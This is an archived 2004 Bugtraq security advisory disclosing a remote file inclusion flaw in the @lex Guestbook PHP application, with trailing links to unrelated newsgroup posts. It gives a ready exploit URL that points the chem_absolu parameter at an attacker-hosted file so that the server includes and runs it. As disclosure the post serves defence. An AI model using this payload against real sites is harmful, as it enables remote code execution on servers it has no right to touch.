@lex Guestbook (PHP) Include file

From: Himeur Nourredine (lostnoobs_at_security-challenge.com)
Date: 09/26/04

  • Next message: Matthew E. Lauterbach: "RE: Promiscuous email printing in Canon imageRunner" 
    Date: 26 Sep 2004 14:36:56 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    Informations :
    °°°°°°°°°°°°°°
    Website : http://www.alexphpteam.com
    Version : all
    Problem : Include file

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    ./include/livre_include.php

    ------------------------------------------------------------------
    if (!$no_connect).... some include() functions
    ------------------------------------------------------------------

    Exploit :
    °°°°°°°°°
    http://[target]/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f

    Patch :
    °°°°°°°
    You must to fix the variable $chem_absolu.

    Nourredine Himeur aka LostNoobs

    "I'm looking for a job in France"
    you can see my curriculum vitae
    on www.security-challenge.com/delires/

    #s-c on irc.fr.worldnet.net
    www.security-challenge.com
    www.hacklink.net
    www.opensavoir.com

  • Next message: Matthew E. Lauterbach: "RE: Promiscuous email printing in Canon imageRunner"

    Relevant Pages

    • Re: Text Editing Problem
      ... the website, I fixed it. ... so we still don't even know what characters you are talking ... to think that WYSIWYG is the editor's name. ... "Sounds like an encoding issue. ...
      (alt.html)
    • Re: Alternative to CMS Encore Pro and CityDesk using the power of Visual Web Developer
      ... implementation technology. ... server environment. ... updating the look of a website. ... omission of entity encoding for & characters in URLs, ...
      (comp.infosystems.www.authoring.html)
    • Re: Japanese encoding
      ... edit my file using the editor which is on their website. ... encoding is set to Unicode. ... Japanese websites, for instance, yahoo.co.jp. ... Japanese isn't an encoding. ...
      (sci.lang.japan)
    • Re: IE 6 on WindowsXP SP2 - Encoding Problems
      ... you visit a website that has a script to change your encoding so that it will ... I have just been manually adjusting the encoding for the sites I need to go ... on where the encoding changes. ... > How to make a good newsgroup post: ...
      (microsoft.public.windows.inetexplorer.ie6.browser)
    • Re: Python.org, Website of Satan
      ... ('binary' encoding is not supported, ... > What is this website with such a demonic name and IP address? ... > evils are the programmers who use this language up to? ... SAVIOUR MUD SONG - besmirching the name of our Lord through filthy canticles! ...
      (comp.lang.python)